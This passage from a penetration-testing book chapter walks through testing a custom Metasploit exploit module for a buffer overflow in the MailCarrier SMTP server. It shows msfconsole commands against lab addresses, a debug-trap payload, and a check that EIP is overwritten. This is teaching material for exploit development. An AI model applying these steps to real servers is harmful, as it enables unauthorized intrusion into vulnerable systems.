220

Chapter 15

In this case, we’ve selected an interrupt (breakpoint) at   so that execution will pause when it reaches our shellcode without us having to set a breakpoint.

Having configured the exploit section, we save the file as mailcarrier_book.rb at modules/exploits/windows/smtp/.

Testing Our Base Exploit

In the next step, we load the module in msfconsole, set the required options, and configure a payload of generic/debug_trap (a great payload for exploit development that triggers a stop point when you are tracing the application in a debugger). Then we run the module:

msf > use exploit/windows/smtp/mailcarrier_book
msf exploit(mailcarrier_book) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local address
   RHOST                   yes       The target address
   RPORT  25               yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2 - EN

msf exploit(mailcarrier_book) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(mailcarrier_book) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf exploit(mailcarrier_book) > set payload generic/debug_trap
payload => generic/debug_trap
msf exploit(mailcarrier_book) > exploit

[*] Exploit completed, but no session was created.
msf exploit(mailcarrier_book) >

We set the options as if we were running a normal exploit, except that we use the generic/debug_trap payload to test our exploit.

After the module runs, the debugger should pause with EIP overwritten by 42424242 as shown in Figure 15-1; if you see a successful EIP overwrite of 42424242, you know your exploit is working. Notice in Figure 15-1 that the EIP register points to 42424242 and that the NOP slide and the dummy payload have made it into the buffer as expected.